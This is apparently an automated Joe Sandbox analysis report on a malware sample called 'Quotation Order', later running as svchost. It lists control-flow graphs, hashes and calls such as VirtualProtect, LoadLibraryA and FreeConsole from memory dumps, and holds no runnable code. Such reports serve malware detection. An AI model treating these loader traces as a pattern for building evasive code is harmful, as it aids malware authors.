                                                                                                                                                                                                                                                    control_flow_graph 1030 7ff7c19c2d84-7ff7c19c2d8b 1031 7ff7c19c2d96-7ff7c19c2e4f VirtualProtect 1030->1031 1032 7ff7c19c2d8d-7ff7c19c2d95 1030->1032 1036 7ff7c19c2e51 1031->1036 1037 7ff7c19c2e57-7ff7c19c2e7f 1031->1037 1032->1031 1036->1037
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: 9eb191c8e53d2f0240c215f3a2c2183f6814b44dd2d9b0f5c1f4ccddb927ad2a
                                                                                                                                                                                                                                                    • Instruction ID: a3350909af581f43f3111202694d1a9b6a9676f90b21dc008cbab2467175d768
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9eb191c8e53d2f0240c215f3a2c2183f6814b44dd2d9b0f5c1f4ccddb927ad2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1131F83190CA4C5FDB08EF58984A6F9BBE1FB66321F04426FD049C3292DF746856CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19C0F15 Relevance: 1.6, APIs: 1, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1038 7ff7c19c0f15-7ff7c19c2e4f VirtualProtect 1042 7ff7c19c2e51 1038->1042 1043 7ff7c19c2e57-7ff7c19c2e7f 1038->1043 1042->1043
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: f82aca8611c01e94d673d45bc30a689a1c98d39733a832300be5b140783461b7
                                                                                                                                                                                                                                                    • Instruction ID: b099ee9c82b21dc4348f1b7c0d749b29e5c6e438182de305b317f14193f5fd42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f82aca8611c01e94d673d45bc30a689a1c98d39733a832300be5b140783461b7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC31E43190CA1C9FDB08EF5898496F9BBE1FBA9321F10422ED04AD3291CB706846CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19C0A58 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1044 7ff7c19c0a58-7ff7c19c0a5f 1045 7ff7c19c0a61-7ff7c19c0a69 1044->1045 1046 7ff7c19c0a6a-7ff7c19c0afc FreeConsole 1044->1046 1045->1046 1049 7ff7c19c0b04-7ff7c19c0b2b 1046->1049 1050 7ff7c19c0afe 1046->1050 1050->1049
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 771614528-0
                                                                                                                                                                                                                                                    • Opcode ID: 761f67af348657ee1b68a6b6f2ec70ac3f9d1ee99081bff1a6d2f6d2c896850b
                                                                                                                                                                                                                                                    • Instruction ID: 033d73d8feceb611124c5afe505e6473f84138150e3ee94f5f9b9594775578be
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 761f67af348657ee1b68a6b6f2ec70ac3f9d1ee99081bff1a6d2f6d2c896850b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4631957190CB488FDB19DF68D8497EABBE4EB66321F00426ED089C3192DA74B455CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1AA01C8 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1294309321.00007FF7C1AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1AA0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c1aa0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d4ffd186be057ee5b86a77ba9ad15b8c7afcceb0c35c85d5882a876e2f6a923c
                                                                                                                                                                                                                                                    • Instruction ID: 02abf1879ba70b3ca23d523377af58b9250aeae1b84f382469c72a0bb59dae1b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4ffd186be057ee5b86a77ba9ad15b8c7afcceb0c35c85d5882a876e2f6a923c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9451C334508A4D8FDB59EF19C894AB9B7A1FF54314F9402BAC04EC7186CEB5E856CBD0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1AA0040 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1294309321.00007FF7C1AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1AA0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c1aa0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6b892078cd57cfc290d6293d6b7d2399a1e3dc1db1ddd540bccc5311f61b21da
                                                                                                                                                                                                                                                    • Instruction ID: efe52d36a100a5b66ca3b97066afa302e84e8d36bff8db2b1ac8b55f9fa47719
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b892078cd57cfc290d6293d6b7d2399a1e3dc1db1ddd540bccc5311f61b21da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6241B63090C64A8FD755EF19C555ABCFBA0FF55314F9401BBC04ACB186DAB5A846CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7C19C8EF0 Relevance: 2.0, Strings: 1, Instructions: 790COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: J_L
                                                                                                                                                                                                                                                    • API String ID: 0-3966387191
                                                                                                                                                                                                                                                    • Opcode ID: f09f9c211f9021212fff059aee2672a7b97d431e0f1edae1363fb2e8cef9427a
                                                                                                                                                                                                                                                    • Instruction ID: 01c84cb591addb5c7fa83b729812ff413487bfc5864b3da159e4a4db49b2959c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f09f9c211f9021212fff059aee2672a7b97d431e0f1edae1363fb2e8cef9427a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE42773090D6864FE759AF24C8516B5BBE1EF96324F4481BEC08ECB5D3CE68A846C761
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19C44B0 Relevance: .9, Instructions: 934COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c1ee04c4c12474ad430f60f33de10b8eef73679597b4bf13186d78ee79697803
                                                                                                                                                                                                                                                    • Instruction ID: 9b80c5c85f05c02909bbf4ebdab3fc596329b5a22070449795619d2e7de925c9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1ee04c4c12474ad430f60f33de10b8eef73679597b4bf13186d78ee79697803
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E62563090C6864FE758AF14C4416B4BBE2EF96324F5481BDD48ECB5D3DE68B886C7A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:13.4%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:24
                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                    execution_graph 12649 7ff7c19b2e84 12650 7ff7c19b2e8d 12649->12650 12661 7ff7c19b2780 12650->12661 12652 7ff7c19b2ed3 12666 7ff7c19b0618 12652->12666 12655 7ff7c19b2780 LoadLibraryA 12656 7ff7c19b2f09 12655->12656 12657 7ff7c19b0618 LoadLibraryA 12656->12657 12658 7ff7c19b2f2b 12657->12658 12659 7ff7c19b2780 LoadLibraryA 12658->12659 12660 7ff7c19b2f38 12659->12660 12664 7ff7c19b279b 12661->12664 12662 7ff7c19b27ef 12662->12652 12663 7ff7c19b2930 LoadLibraryA 12665 7ff7c19b2984 12663->12665 12664->12652 12664->12662 12664->12663 12665->12652 12667 7ff7c19b3000 12666->12667 12668 7ff7c19b2780 LoadLibraryA 12667->12668 12669 7ff7c19b2efc 12668->12669 12669->12655 12670 7ff7c19b2d84 12671 7ff7c19b2d8d VirtualProtect 12670->12671 12673 7ff7c19b2e51 12671->12673 12674 7ff7c19b0a58 12675 7ff7c19b0a61 FreeConsole 12674->12675 12677 7ff7c19b0afe 12675->12677

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7C1A90D71 Relevance: 1.2, Instructions: 1219COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1566 7ff7c1a90d71-7ff7c1a90e13 1571 7ff7c1a90e15-7ff7c1a90e26 1566->1571 1572 7ff7c1a90e56 1566->1572 1573 7ff7c1a90e57-7ff7c1a90e68 1572->1573 1574 7ff7c1a90e37-7ff7c1a90e55 1573->1574 1575 7ff7c1a90e6a-7ff7c1a90ecf 1573->1575 1574->1572 1574->1573 1579 7ff7c1a90ed5-7ff7c1a90ee8 1575->1579 1580 7ff7c1a91027-7ff7c1a91036 1575->1580 1579->1580 1581 7ff7c1a90eee-7ff7c1a90f1a 1579->1581 1584 7ff7c1a91038-7ff7c1a91039 1580->1584 1581->1580 1582 7ff7c1a90f20-7ff7c1a90f33 1581->1582 1589 7ff7c1a90fa4-7ff7c1a90fb6 1582->1589 1590 7ff7c1a90f35-7ff7c1a90f36 1582->1590 1585 7ff7c1a9103b 1584->1585 1586 7ff7c1a9103c-7ff7c1a91058 1584->1586 1585->1586 1588 7ff7c1a9105b-7ff7c1a91069 1586->1588 1592 7ff7c1a9106b-7ff7c1a91097 1588->1592 1589->1580 1591 7ff7c1a90fb8-7ff7c1a90fea 1589->1591 1593 7ff7c1a90f38-7ff7c1a90f3a 1590->1593 1594 7ff7c1a90efc-7ff7c1a90f00 1590->1594 1591->1588 1613 7ff7c1a90fec-7ff7c1a90fef 1591->1613 1595 7ff7c1a91099-7ff7c1a910b0 1592->1595 1596 7ff7c1a910cc-7ff7c1a910e4 1592->1596 1604 7ff7c1a90f81 1593->1604 1605 7ff7c1a90f3c-7ff7c1a90f45 1593->1605 1597 7ff7c1a90f02 1594->1597 1598 7ff7c1a90f03-7ff7c1a90f1a 1594->1598 1601 7ff7c1a91121-7ff7c1a91157 1595->1601 1602 7ff7c1a910b2-7ff7c1a910ca 1595->1602 1597->1598 1598->1580 1598->1582 1615 7ff7c1a91159-7ff7c1a91170 1601->1615 1616 7ff7c1a9118c-7ff7c1a911a4 1601->1616 1602->1596 1604->1580 1606 7ff7c1a90f87-7ff7c1a90fa2 1604->1606 1611 7ff7c1a90f66-7ff7c1a90f7e 1605->1611 1612 7ff7c1a90f47-7ff7c1a90f65 1605->1612 1606->1589 1611->1604 1612->1580 1622 7ff7c1a90f6b-7ff7c1a90f7e 1612->1622 1613->1592 1619 7ff7c1a90ff1 1613->1619 1620 7ff7c1a911e1-7ff7c1a91264 1615->1620 1621 7ff7c1a91172-7ff7c1a9118a 1615->1621 1619->1584 1623 7ff7c1a90ff3-7ff7c1a91026 1619->1623 1621->1616 1622->1604
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000F.00000002.1527028462.00007FF7C1A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A90000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7c1a90000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 012f5ae2bd05e4b79548d847e69c6b9b365b9ec155466b3992d1f5361c1dbbaa
                                                                                                                                                                                                                                                    • Instruction ID: 8a1cc7fc282fb1e7ae4760e76c0c9cf4e27e4f3988ab120fd7a91f79315f204d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 012f5ae2bd05e4b79548d847e69c6b9b365b9ec155466b3992d1f5361c1dbbaa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E782157190DBC94FD756EF288C556A8BFA0EF56320F4901FFC489CB193DA68A846C361
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19B2780 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000F.00000002.1526069589.00007FF7C19B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7c19b0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                    • API String ID: 1029625771-3993045852
                                                                                                                                                                                                                                                    • Opcode ID: 79a21bc5f9a4b46e9aa8f68292f5e21d564bcac745a515dd30e96eeb15f16191
                                                                                                                                                                                                                                                    • Instruction ID: f91a510f7e027bea4157821265d4ebee5f31d5d11d5c2b900f02c458132f3ec9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79a21bc5f9a4b46e9aa8f68292f5e21d564bcac745a515dd30e96eeb15f16191
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4481C430508A4D8FEB58EF28D8457F5B7D1FF59325F10427EE84EC3292DA79A8418B92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1A9026B Relevance: 2.3, Strings: 1, Instructions: 1087COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 35 7ff7c1a9026b-7ff7c1a9026d 36 7ff7c1a903b1-7ff7c1a903b7 35->36 37 7ff7c1a9026e-7ff7c1a9027c 35->37 42 7ff7c1a903b9-7ff7c1a903c8 36->42 38 7ff7c1a90284-7ff7c1a90286 37->38 40 7ff7c1a902f7-7ff7c1a90306 38->40 41 7ff7c1a90288-7ff7c1a90289 38->41 45 7ff7c1a90307-7ff7c1a90309 40->45 43 7ff7c1a9024f-7ff7c1a9026a 41->43 44 7ff7c1a9028b 41->44 46 7ff7c1a903c9-7ff7c1a90427 42->46 43->35 44->45 47 7ff7c1a9028d 44->47 45->36 48 7ff7c1a9030a-7ff7c1a90348 45->48 49 7ff7c1a90429-7ff7c1a90440 46->49 50 7ff7c1a9045c-7ff7c1a90474 46->50 52 7ff7c1a9028f-7ff7c1a902a0 47->52 53 7ff7c1a902d4 47->53 48->42 72 7ff7c1a9034a-7ff7c1a9034d 48->72 55 7ff7c1a904b1-7ff7c1a904b8 49->55 56 7ff7c1a90442-7ff7c1a9045a 49->56 65 7ff7c1a902a2-7ff7c1a902b8 52->65 66 7ff7c1a90233-7ff7c1a9024e 52->66 53->36 60 7ff7c1a902da-7ff7c1a902f5 53->60 58 7ff7c1a90487-7ff7c1a904af 55->58 59 7ff7c1a904b9-7ff7c1a904d0 55->59 56->50 67 7ff7c1a904d1-7ff7c1a904d5 56->67 58->55 59->67 60->40 65->36 69 7ff7c1a902be-7ff7c1a902d1 65->69 66->43 70 7ff7c1a904d6 67->70 71 7ff7c1a904d7-7ff7c1a904e7 67->71 69->53 70->71 73 7ff7c1a904e9-7ff7c1a90500 71->73 74 7ff7c1a9051c-7ff7c1a90534 71->74 72->46 75 7ff7c1a9034f 72->75 76 7ff7c1a90571-7ff7c1a90578 73->76 77 7ff7c1a90502-7ff7c1a9051a 73->77 81 7ff7c1a90351-7ff7c1a9035f 75->81 82 7ff7c1a90396-7ff7c1a903b0 75->82 79 7ff7c1a90547-7ff7c1a9056f 76->79 80 7ff7c1a9057a-7ff7c1a90590 76->80 77->74 79->76 84 7ff7c1a90592 80->84 85 7ff7c1a90597-7ff7c1a905a7 80->85 81->82 84->85 88 7ff7c1a905a9-7ff7c1a905c0 85->88 89 7ff7c1a905dc-7ff7c1a905f4 85->89 91 7ff7c1a90631-7ff7c1a90638 88->91 92 7ff7c1a905c2-7ff7c1a905da 88->92 95 7ff7c1a90607-7ff7c1a9062b 91->95 96 7ff7c1a9063a-7ff7c1a90668 91->96 92->89 95->91 98 7ff7c1a9066a-7ff7c1a9067a 96->98 99 7ff7c1a9069d-7ff7c1a906a8 96->99 101 7ff7c1a906eb-7ff7c1a906f8 98->101 102 7ff7c1a9067c-7ff7c1a9067e 98->102 103 7ff7c1a906aa-7ff7c1a906b9 99->103 104 7ff7c1a906bc-7ff7c1a906c5 99->104 105 7ff7c1a906fa-7ff7c1a90708 101->105 102->105 106 7ff7c1a90680 102->106 103->104 108 7ff7c1a906c6-7ff7c1a906c7 104->108 110 7ff7c1a906d7-7ff7c1a906e9 105->110 111 7ff7c1a9070a-7ff7c1a9073c 105->111 107 7ff7c1a90682-7ff7c1a9069c 106->107 106->108 107->99 110->101 113 7ff7c1a90786-7ff7c1a9078b 111->113 114 7ff7c1a9073e-7ff7c1a90772 111->114 115 7ff7c1a90a42-7ff7c1a90a56 113->115 116 7ff7c1a9078c-7ff7c1a9079e 113->116 114->115 117 7ff7c1a90778-7ff7c1a90781 114->117 122 7ff7c1a90a57-7ff7c1a90ab7 115->122 118 7ff7c1a9079f-7ff7c1a907bd 116->118 119 7ff7c1a90783-7ff7c1a90785 117->119 118->115 121 7ff7c1a907c3-7ff7c1a907d6 118->121 119->113 126 7ff7c1a90847-7ff7c1a90856 121->126 127 7ff7c1a907d8-7ff7c1a907d9 121->127 128 7ff7c1a90ab9-7ff7c1a90ad0 122->128 129 7ff7c1a90aec-7ff7c1a90b04 122->129 131 7ff7c1a90857-7ff7c1a90859 126->131 127->118 130 7ff7c1a907db 127->130 133 7ff7c1a90b41-7ff7c1a90b77 128->133 134 7ff7c1a90ad2-7ff7c1a90aeb 128->134 129->133 130->131 135 7ff7c1a907dd 130->135 131->115 132 7ff7c1a9085a-7ff7c1a90872 131->132 149 7ff7c1a908e3-7ff7c1a908f0 132->149 150 7ff7c1a90874-7ff7c1a90877 132->150 137 7ff7c1a90b79-7ff7c1a90b90 133->137 138 7ff7c1a90bac-7ff7c1a90bc4 133->138 134->129 140 7ff7c1a907df-7ff7c1a907f0 135->140 141 7ff7c1a90824 135->141 143 7ff7c1a90c01-7ff7c1a90c37 137->143 144 7ff7c1a90b92-7ff7c1a90bab 137->144 140->119 154 7ff7c1a907f2-7ff7c1a90808 140->154 141->115 148 7ff7c1a9082a-7ff7c1a90845 141->148 151 7ff7c1a90c39-7ff7c1a90c50 143->151 152 7ff7c1a90c6c-7ff7c1a90c84 143->152 144->138 148->126 155 7ff7c1a908f3 149->155 150->155 156 7ff7c1a90879 150->156 157 7ff7c1a90cc1-7ff7c1a90cc4 151->157 158 7ff7c1a90c52-7ff7c1a90c6a 151->158 154->115 161 7ff7c1a9080e-7ff7c1a90821 154->161 155->115 168 7ff7c1a908f9-7ff7c1a9090c 155->168 163 7ff7c1a908c0 156->163 164 7ff7c1a9087b-7ff7c1a908a2 156->164 166 7ff7c1a90cd2-7ff7c1a90cfe 157->166 167 7ff7c1a90cc6-7ff7c1a90cc8 157->167 158->152 161->141 171 7ff7c1a908c2 163->171 172 7ff7c1a908c3-7ff7c1a908e1 163->172 164->115 176 7ff7c1a908a8-7ff7c1a908be 164->176 173 7ff7c1a90c97-7ff7c1a90cbf 167->173 174 7ff7c1a90cca-7ff7c1a90cd0 167->174 178 7ff7c1a9097d-7ff7c1a90990 168->178 179 7ff7c1a9090e-7ff7c1a90912 168->179 171->172 172->149 173->157 174->166 176->115 176->163 180 7ff7c1a90993 178->180 179->180 181 7ff7c1a90914 179->181 180->115 183 7ff7c1a90999-7ff7c1a909b5 180->183 182 7ff7c1a90974-7ff7c1a9097a 181->182 182->178 186 7ff7c1a909d2-7ff7c1a909e6 183->186 187 7ff7c1a909b7-7ff7c1a909cc 183->187 186->122 188 7ff7c1a909e8-7ff7c1a909ed 186->188 187->186 188->182 190 7ff7c1a909ef 188->190 190->115
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000F.00000002.1527028462.00007FF7C1A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A90000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7c1a90000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                                                    • API String ID: 0-3554254475
                                                                                                                                                                                                                                                    • Opcode ID: 6d48b0672d806bf4606f6d11d954b28e805308a2bf103f8cd3ca6b2be3aadfa4
                                                                                                                                                                                                                                                    • Instruction ID: a3eac143a8a83f0979467310b59f8364e3b115eae84f284bf033599cb4528985
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d48b0672d806bf4606f6d11d954b28e805308a2bf103f8cd3ca6b2be3aadfa4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E672773180DB858FD716EF288C55AA8BFA0FF56350F5801FBC089CB193DA69A846C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19B2D84 Relevance: 1.6, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1142 7ff7c19b2d84-7ff7c19b2d8b 1143 7ff7c19b2d96-7ff7c19b2e4f VirtualProtect 1142->1143 1144 7ff7c19b2d8d-7ff7c19b2d95 1142->1144 1147 7ff7c19b2e51 1143->1147 1148 7ff7c19b2e57-7ff7c19b2e7f 1143->1148 1144->1143 1147->1148
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000F.00000002.1526069589.00007FF7C19B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7c19b0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: 4c0645a3fb64ac6f7593a3afacde921d8eccb0bb556fd43704d7d7ba189764bf
                                                                                                                                                                                                                                                    • Instruction ID: 8f41caf9bdd682a58aec95fe67a2ccfba6140a96cde4eaef8abfe0fbb91342a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c0645a3fb64ac6f7593a3afacde921d8eccb0bb556fd43704d7d7ba189764bf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C31F63090CB488FDB18EFA8984A6F9BBE1FF55321F04426FD049C3292CB746856CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19B0A58 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1149 7ff7c19b0a58-7ff7c19b0a5f 1150 7ff7c19b0a61-7ff7c19b0a69 1149->1150 1151 7ff7c19b0a6a-7ff7c19b0afc FreeConsole 1149->1151 1150->1151 1154 7ff7c19b0b04-7ff7c19b0b2b 1151->1154 1155 7ff7c19b0afe 1151->1155 1155->1154
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000F.00000002.1526069589.00007FF7C19B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7c19b0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFree
